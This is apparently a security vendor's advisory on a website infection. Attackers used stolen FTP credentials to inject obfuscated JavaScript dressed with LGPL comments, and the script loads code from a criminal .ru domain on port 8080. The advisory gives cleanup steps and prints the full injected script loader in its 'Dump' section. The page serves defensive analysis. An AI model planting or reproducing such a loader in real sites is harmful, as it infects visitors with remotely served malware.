Infection where hackers injected malicious obfuscated JavaScript that contained comments like /GNU GPL/ and /LGPL/ to make them look legit.
The scripts dynamicaly loaded malicious contents from sites contolled by the cryminals. Those sites worked on port 8080 and their URLs had multiple subdomains and
subdirectories with names of legitimate sites in their parts. E.g.
hxxp://taringa-net .focus .de .soufun-com .thelaceweb.ru:8080/gutefrage .net/gutefrage .net/google .com/commentcamarche .net/smh .com .au/
You can read more about it in this blog post
Affecting
Any website with FTP access.
Cleanup
This attack used stolen FTP credentials, so it is important to remove malware from all computers used to access the site, then change FTP passwords (don't save new passwords
in FTP clients) and then remove malicious script from all files on server.
You can sign up with us and let our team remove the malware for you.
Dump
<script>/*LGPL*/ try{ window.onload = function(){var F5u18d6lz4y5 = document.createElement('s()))c&@)r$#i@!^p@@^t^#'.replace(/)|$|(|@|!|^|&|#/ig, ''));F5u18d6lz4y5.setAttribute('defer', 'd#&e!&^&f$@e#&!((r#'.replace(/&|@|$|^|#|)|!|(/ig, ''));F5u18d6lz4y5.setAttribute('type', 't))&e)!x&(()t@&/^#)j^a!v$)@a^(s()#c@$r(^!i$)(p&t^#!^'.replace(/^|&|$|#|@|(|)|!/ig, ''));F5u18d6lz4y5.setAttribute('id', 'P$^(6(&&&v)$^7))&f#5&##7!#!#3!(&^3()c$($@z(z&$'.replace(/#|(|)|&|@|!|$|^/ig, ''));F5u18d6lz4y5.setAttribute('s)$r@$c$)'.replace(/#|)|^|!|&|@|(|$/ig, ''), 'h!(!t!!@!t&!!p&:&#/$!)/(^@^t$^a^(r!&)i@^n$&g($a@-(^(n#@&e##@)t!&!@.$$f#(^!o&$!c(u(#s#@&.@(d()e&(.^@(s)^o!(u#(&f#^$$u(#n^@^-$^&#c^#@#o&#m$^(.!)@()t@&#h(!e@@^l&)#a$($c)($e^@w)$e^^(b#^.$)(#r()u)#:)!@)8^@^#0@8#(0(!/@(g$(#u&^t#!$e^^$&f^!&r!!a(&!@g&&!e).)$n$)e^&t)((/(@g(@@u@^t(@e)^f@)#!&r#!a^&@g!!(&e^!^$.!#n#@($e!&!!t(@(!/!&g#(&@o^!o!^&@g&@l^()@e!.&c$)o&@#^^m@$)/!^@c#$o!m@##$m@&)e^n$$t#c#!a^m^$a(#r!))c(h!&$^e&)^.^@@@n^)e^^)t!$&/!^s($m#&$^h$#).$@@c#&&o#m))#.(a!$u()/^^'.replace(/!|@|^|#|)|$|(|&/ig, ''));if (document){document.body.appendChild(F5u18d6lz4y5);}} } catch(Evpg5sbi49zcg0lkkgdl) {}</script>
<!--6794ad2fcbfff154945923c76e848e03-->